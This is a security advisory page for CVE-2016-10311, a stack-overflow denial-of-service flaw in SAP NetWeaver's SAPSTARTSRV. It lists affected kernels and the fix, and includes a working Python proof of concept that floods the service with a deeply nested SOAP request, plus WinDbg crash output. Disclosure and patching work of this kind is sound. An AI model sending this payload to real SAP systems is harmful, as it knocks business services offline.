Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
erpscanERPScanERPSCAN-16-030
HistorySep 03, 2016 - 12:00 a.m.

SAP NetWeaver - buffer overflow vulnerability

2016-09-0300:00:00
erpscan.io
26

0.007 Low

EPSS

Percentile

80.7%

JSON

Application: SAP NetWeaver **Versions Affected:**SAP NetWeaver 7.0-7.5 Vendor URL: SAP **Bugs:**buffer overflow **Reported:**09.03.2016 **Vendor response:**10.03.2016 **Date of Public Advisory:**12.07.2016 **Reference:**SAP Security Note 2295238 Author: Dmitry Yudin (ERPScan)

VULNERABILITY INFORMATION

Class: Denial of Service
Impact: DoS
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2016-10311

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality None (N)
I: Impact to Integrity Low (L)
A: Impact to Availability Low (L)

Description

This vulnerability allows an attacker to send a special request to the SAPSTARTSRV process port and conduct stack buffer overflow (recursion) on the SAP server.

Business risk

An attacker can use Buffer overflow vulnerability to inject a specially crafted code into a working memory which will be executed by a vulnerable application. Executed commands will run with the same privileges as a service that executed a command. This can lead to taking complete control of an application, denial of service, command execution, and other attacks. In case of command execution, an attacker can obtain critical technical and business-related information stored in a vulnerable SAP-system or use it for privilege escalation. Speaking about denial of service, terminating a process of a vulnerable component is possible. For this time nobody can use this service, this fact negatively influences on business processes, system downtime and business reputation as result.

VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2295238.

TECHNICAL DESCRIPTION

Proof of Concept

import socket PoC= “”“<?xml version=“1.0” encoding=“utf-8”?> <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xs=“http://www.w3.org/2001/XMLSchema”> <SOAP-ENV:Header> <sapsess:Session xlmns:sapsess=“http://www.sap.com/webas/630/soap/features/session/”> >”“” + “<a>” * 100000 + “</a>” * 100000 + “”" </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:WW xmlns:ns1=“urn:SAPControl”> <b></b> <e><e> </ns1:WW> </SOAP-ENV:Body> </SOAP-ENV:Envelope>“”" for i in range(1,5): sock = socket.socket() sock.connect((“SAP_IP”, SAP_PORT)) sock.send(PoC) Windbg exceptions sapstartsrv!soap_getutf8+0xa: 000000014009cd2a e891f9ffff call sapstartsrv!soap_get (000000014009c6c0) rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0 rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0 rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0 r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000 r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f r14=00000001409f8ba0 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

|

import socket

PoC= “”"<?xml version=“1.0” encoding=“utf-8”?>

<SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xs=“http://www.w3.org/2001/XMLSchema”>

<SOAP-ENV:Header>

<sapsess:Session xlmns:sapsess=“http://www.sap.com/webas/630/soap/features/session/”>

>“”" + “<a>” * 100000 + “</a>” * 100000 + “”" </sapsess:Session>

</SOAP-ENV:Header>

<SOAP-ENV:Body>

<ns1:WW xmlns:ns1=“urn:SAPControl”>

<b></b>

<e><e>

</ns1:WW>

</SOAP-ENV:Body>

</SOAP-ENV:Envelope>“”"

for i in range(1,5):

sock = socket.socket()

sock.connect((“SAP_IP”, SAP_PORT))

sock.send(PoC)

Windbg exceptions

sapstartsrv!soap_getutf8+0xa:

000000014009cd2a e891f9ffff call sapstartsrv!soap_get (000000014009c6c0)

rax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0

rdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0

rip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0

r8=0000000134936c69 r9=0000000000000000 r10=0000000000000000

r11=000000014061ee28 r12=0000000000000000 r13=000000000000270f

r14=00000001409f8ba0 r15=0000000000000000

iopl=0 nv up ei pl nz na po nc

cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206

—|—

Related

prion 1
cvelist 1
nvd 1
cve 1
prion
prion
Stack overflow
2017-04-10 15:59:00
cvelist
cvelist
CVE-2016-10311
2017-04-10 15:00:00
nvd
nvd
CVE-2016-10311
2017-04-10 15:59:00
cve
cve
CVE-2016-10311
2017-04-10 15:59:00

0.007 Low

EPSS

Percentile

80.7%

JSON
Related for ERPSCAN-16-030
prion1cvelist1nvd1cve1